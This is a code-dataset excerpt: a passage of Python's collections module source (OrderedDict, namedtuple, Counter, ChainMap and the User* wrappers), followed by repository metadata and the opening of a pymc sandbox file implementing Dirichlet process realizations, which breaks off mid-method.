# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''Remove and return a (key, value) pair from the dictionary.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last==False).
Raises KeyError if the element does not exist.
When last=True, acts like a fast version of self[key]=self.pop(key).
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
soft_link = link_next.prev
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
root.prev = soft_link
last.next = link
else:
first = root.next
link.prev = root
link.next = first
first.prev = soft_link
root.next = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = MutableMapping.update
def keys(self):
"D.keys() -> a set-like object providing a view on D's keys"
return _OrderedDictKeysView(self)
def items(self):
"D.items() -> a set-like object providing a view on D's items"
return _OrderedDictItemsView(self)
def values(self):
"D.values() -> an object providing a view on D's values"
return _OrderedDictValuesView(self)
__ne__ = MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
return self.__class__, (), inst_dict or None, None, iter(self.items())
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return dict.__eq__(self, other) and all(map(_eq, self, other))
return dict.__eq__(self, other)
try:
from _collections import OrderedDict
except ImportError:
# Leave the pure Python version in place.
pass
################################################################################
### namedtuple
################################################################################
_class_template = """\
from builtins import property as _property, tuple as _tuple
from operator import itemgetter as _itemgetter
from collections import OrderedDict
class {typename}(tuple):
'{typename}({arg_list})'
__slots__ = ()
_fields = {field_names!r}
def __new__(_cls, {arg_list}):
'Create new instance of {typename}({arg_list})'
return _tuple.__new__(_cls, ({arg_list}))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new {typename} object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != {num_fields:d}:
raise TypeError('Expected {num_fields:d} arguments, got %d' % len(result))
return result
def _replace(_self, **kwds):
'Return a new {typename} object replacing specified fields with new values'
result = _self._make(map(kwds.pop, {field_names!r}, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % list(kwds))
return result
def __repr__(self):
'Return a nicely formatted representation string'
return self.__class__.__name__ + '({repr_fmt})' % self
def _asdict(self):
'Return a new OrderedDict which maps field names to their values.'
return OrderedDict(zip(self._fields, self))
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
{field_defs}
"""
_repr_template = '{name}=%r'
_field_template = '''\
{name} = _property(_itemgetter({index:d}), doc='Alias for field number {index:d}')
'''
def namedtuple(typename, field_names, *, verbose=False, rename=False, module=None):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Validate the field names. At the user's option, either generate an error
# message or automatically replace the field name with a valid name.
if isinstance(field_names, str):
field_names = field_names.replace(',', ' ').split()
field_names = list(map(str, field_names))
typename = str(typename)
if rename:
seen = set()
for index, name in enumerate(field_names):
if (not name.isidentifier()
or _iskeyword(name)
or name.startswith('_')
or name in seen):
field_names[index] = '_%d' % index
seen.add(name)
for name in [typename] + field_names:
if type(name) is not str:
raise TypeError('Type names and field names must be strings')
if not name.isidentifier():
raise ValueError('Type names and field names must be valid '
'identifiers: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a '
'keyword: %r' % name)
seen = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: '
'%r' % name)
if name in seen:
raise ValueError('Encountered duplicate field name: %r' % name)
seen.add(name)
# Fill-in the class template
class_definition = _class_template.format(
typename = typename,
field_names = tuple(field_names),
num_fields = len(field_names),
arg_list = repr(tuple(field_names)).replace("'", "")[1:-1],
repr_fmt = ', '.join(_repr_template.format(name=name)
for name in field_names),
field_defs = '\n'.join(_field_template.format(index=index, name=name)
for index, name in enumerate(field_names))
)
# Execute the template string in a temporary namespace and support
# tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(__name__='namedtuple_%s' % typename)
exec(class_definition, namespace)
result = namespace[typename]
result._source = class_definition
if verbose:
print(result._source)
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython), or where the user has
# specified a particular module.
if module is None:
try:
module = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
if module is not None:
result.__module__ = module
return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
'Tally elements from the iterable.'
mapping_get = mapping.get
for elem in iterable:
mapping[elem] = mapping_get(elem, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(*args, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
if not args:
raise TypeError("descriptor '__init__' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
super(Counter, self).__init__()
self.update(*args, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(*args, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in the some of original untouched counts
# being mixed-in with all of the other counts for a mismash that
# doesn't have a straight-forward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if not args:
raise TypeError("descriptor 'update' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
super(Counter, self).update(iterable) # fast path when counter is empty
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(*args, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if not args:
raise TypeError("descriptor 'subtract' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
try:
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
except TypeError:
# handle case where values are not orderable
return '{0}({1!r})'.format(self.__class__.__name__, dict(self))
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
def __pos__(self):
'Adds an empty counter, effectively stripping negative and zero counts'
result = Counter()
for elem, count in self.items():
if count > 0:
result[elem] = count
return result
def __neg__(self):
'''Subtracts from an empty counter. Strips positive and zero counts,
and flips the sign on negative counts.
'''
result = Counter()
for elem, count in self.items():
if count < 0:
result[elem] = 0 - count
return result
def _keep_positive(self):
'''Internal method to strip elements with a negative or zero count'''
nonpositive = [elem for elem, count in self.items() if not count > 0]
for elem in nonpositive:
del self[elem]
return self
def __iadd__(self, other):
'''Inplace add from another counter, keeping only positive counts.
>>> c = Counter('abbb')
>>> c += Counter('bcc')
>>> c
Counter({'b': 4, 'c': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] += count
return self._keep_positive()
def __isub__(self, other):
'''Inplace subtract counter, but keep only results with positive counts.
>>> c = Counter('abbbc')
>>> c -= Counter('bccd')
>>> c
Counter({'b': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] -= count
return self._keep_positive()
def __ior__(self, other):
'''Inplace union is the maximum of value from either counter.
>>> c = Counter('abbb')
>>> c |= Counter('bcc')
>>> c
Counter({'b': 3, 'c': 2, 'a': 1})
'''
for elem, other_count in other.items():
count = self[elem]
if other_count > count:
self[elem] = other_count
return self._keep_positive()
def __iand__(self, other):
'''Inplace intersection is the minimum of corresponding counts.
>>> c = Counter('abbb')
>>> c &= Counter('bcc')
>>> c
Counter({'b': 1})
'''
for elem, count in self.items():
other_count = other[elem]
if other_count < count:
self[elem] = other_count
return self._keep_positive()
########################################################################
### ChainMap
########################################################################
class ChainMap(MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can
be accessed or updated using the *maps* attribute. There is no other
state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return '{0.__class__.__name__}({1})'.format(
self, ', '.join(map(repr, self.maps)))
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self, m=None): # like Django's Context.push()
'''New ChainMap with a new map followed by all previous maps.
If no map is provided, an empty dict is used.
'''
if m is None:
m = {}
return self.__class__(m, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
'Remove and return an item pair from maps[0]. Raise KeyError is maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
################################################################################
### UserDict
################################################################################
class UserDict(MutableMapping):
# Start by filling-out the abstract methods
def __init__(*args, **kwargs):
if not args:
raise TypeError("descriptor '__init__' of 'UserDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
if args:
dict = args[0]
elif 'dict' in kwargs:
dict = kwargs.pop('dict')
import warnings
warnings.warn("Passing 'dict' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
else:
dict = None
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def __iter__(self):
return iter(self.data)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self): return repr(self.data)
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
################################################################################
### UserList
################################################################################
class UserList(MutableSequence):
"""A more or less complete user-defined wrapper around list objects."""
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self): return repr(self.data)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cast(self, other):
return other.data if isinstance(other, UserList) else other
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
def __getitem__(self, i): return self.data[i]
def __setitem__(self, i, item): self.data[i] = item
def __delitem__(self, i): del self.data[i]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def append(self, item): self.data.append(item)
def insert(self, i, item): self.data.insert(i, item)
def pop(self, i=-1): return self.data.pop(i)
def remove(self, item): self.data.remove(item)
def clear(self): self.data.clear()
def copy(self): return self.__class__(self)
def count(self, item): return self.data.count(item)
def index(self, item, *args): return self.data.index(item, *args)
def reverse(self): self.data.reverse()
def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(Sequence):
def __init__(self, seq):
if isinstance(seq, str):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __getnewargs__(self):
return (self.data[:],)
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
return self.data == string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
return self.data < string
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
return self.data <= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
return self.data > string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
return self.data >= string
def __contains__(self, char):
if isinstance(char, UserString):
char = char.data
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, str):
return self.__class__(self.data + other)
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, str):
return self.__class__(other + self.data)
return self.__class__(str(other) + self.data)
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
def __rmod__(self, format):
return self.__class__(format % args)
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def casefold(self):
return self.__class__(self.data.casefold())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
return self.__class__(self.data.encode(encoding))
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=_sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.find(sub, start, end)
def format(self, *args, **kwds):
return self.data.format(*args, **kwds)
def format_map(self, mapping):
return self.data.format_map(mapping)
def index(self, sub, start=0, end=_sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def isidentifier(self): return self.data.isidentifier()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isprintable(self): return self.data.isprintable()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars))
maketrans = str.maketrans
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
if isinstance(old, UserString):
old = old.data
if isinstance(new, UserString):
new = new.data
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=_sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=False): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=_sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None): return self.__class__(self.data.strip(chars))
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
def zfill(self, width): return self.__class__(self.data.zfill(width))
| 36.796787
| 99
| 0.577862
|
2b9bf5b23ffba69528229c6840efd7dc6c92908c
| 11,854
|
py
|
Python
|
pymc/sandbox/DP/DP.py
|
matthew-brett/pymc
|
3a31613f056e7993a449d89bafef5fdaa40d47e9
|
[
"MIT"
] | 5
|
2015-12-03T09:42:44.000Z
|
2021-06-06T19:23:29.000Z
|
pymc/sandbox/DP/DP.py
|
matthew-brett/pymc
|
3a31613f056e7993a449d89bafef5fdaa40d47e9
|
[
"MIT"
] | 1
|
2016-09-27T02:00:41.000Z
|
2016-09-27T02:15:32.000Z
|
pymc/sandbox/DP/DP.py
|
matthew-brett/pymc
|
3a31613f056e7993a449d89bafef5fdaa40d47e9
|
[
"MIT"
] | 1
|
2017-10-27T13:27:32.000Z
|
2017-10-27T13:27:32.000Z
|
__author__ = 'Anand Patil, anand.prabhakar.patil@gmail.com'
"""
Dirichlet process classes:
- DPRealization: A Dirichlet process realization. Based on stick-breaking representation,
but step methods should use other representations.
Attributes:
- atoms: A list containing the atom locations.
Methods:
- rand(m): Returns m random values.
- logp(x): A function returning the log-probability of x.
DP: A stochastic valued as a DP realization.
DPDraw: A stochastic distributed as a DP object's value.
Neal cite: Markov chain random methods for Dirichlet process mixture models.
Also study up on Gibbs sampler.
This should all be written in Pyrex eventually. Many things are screaming for
optimization. The C++ vector class would be helpful too but that would have
to be swigged.
"""
import numpy as np
from copy import copy
from pymc import *
def draws_to_atoms(draws):
"""
atoms, n = draws_to_atoms(draws)
atoms is a list of the unique elements in draws,
and n is a list of their corresponding multiplicities.
Needs optimization badly I'm sure.
"""
atoms = []
n = []
for element in np.atleast_1d(draws):
match=False
for i in xrange(len(atoms)):
if all(element == atoms[i]):
n[i] += 1
match=True
break
if not match:
atoms.append(element)
n.append(1)
return atoms, n
try:
import pylab as pl
def plot_atoms(DPr):
"""
plot_atoms(DPr)
Plots the atoms of DP realization DPr.
Base measure must be over the real line.
"""
for pair in zip(DPr.atoms, DPr.n):
plot([pair[0], pair[0]], [0,pair[1]], 'k-')
except ImportError:
pass
class DPRealization(object):
"""
A Dirichlet process realization. This is based on the stick-breaking representation
rather than the Chinese restaurant process in order to provide a logp method. Step methods are
free to use the Chinese restaurant process, though.
Arguments:
- basemeas: The base measure. Must be a function which, when called with argument n, returns a value.
- nu: The whatever parameter.
- draws (optional): DPRealization can be initialized conditional on previous draws.
Useful for Gibbs sampling, maybe MH too.
- basemeas_params: The parameters of the base measure.
Methods:
- rand(m): Returns m random values.
- logp(x): Returns the log-probability of x.
"""
def __init__(self, basemeas_rand, nu, draws=[], **basemeas_params):
# The base measure and its parameters.
self.basemeas_rand = basemeas_rand
self.basemeas_params = basemeas_params
# The tightness parameter.
self.nu = np.float(nu)
if len(draws)>0:
atoms, n = draws_to_atoms(draws)
# The number of draws from each atom.
self.n = n
# The values of the atoms.
self.atoms = atoms
# Need to triple-check that this is OK!
# The probability masses of the atoms.
mass_sofar = rbeta(sum(n), nu)
if len(n) > 1:
self.mass = list((rdirichlet(n) * mass_sofar).squeeze())
else:
self.mass = [mass_sofar]
self.mass_sofar = mass_sofar
self.mass_prod = 1.
for m in self.mass:
self.mass_prod *= (1.-m)
else:
self.n = []
self.atoms = []
self.mass = []
self.mass_sofar = 0.
self.mass_prod = 1.
def logp(self, value):
"""
F.logp(x)
Returns the log of the probability mass assigned to x.
Returns -Inf if x is not in self.atoms; this behavior is fine
for continuous base distributions but incorrect for discrete.
"""
logp_out = 0.
value = np.atleast_1d(value)
for val_now in value:
match=False
for i in xrange(len(self.atoms)):
if all(val_now == self.atoms[i]):
logp_out += log(self.mass[i])
match=True
break
if not match:
return -Inf
return logp_out
def rand(self, m=1):
"""
F.rand(m=1)
Returns m values from the random probability distribution.
"""
draws = np.empty(m, dtype=float)
for i in xrange(m):
# Draw from existing atoms
if np.random.random() < self.mass_sofar:
atom_index = int(flib.rcat(np.asarray(self.mass) / self.mass_sofar,0,1,1))
new_draw = self.atoms[atom_index]
self.n[atom_index] += 1
# Make new atom
else:
new_draw = self.basemeas_rand(**self.basemeas_params)
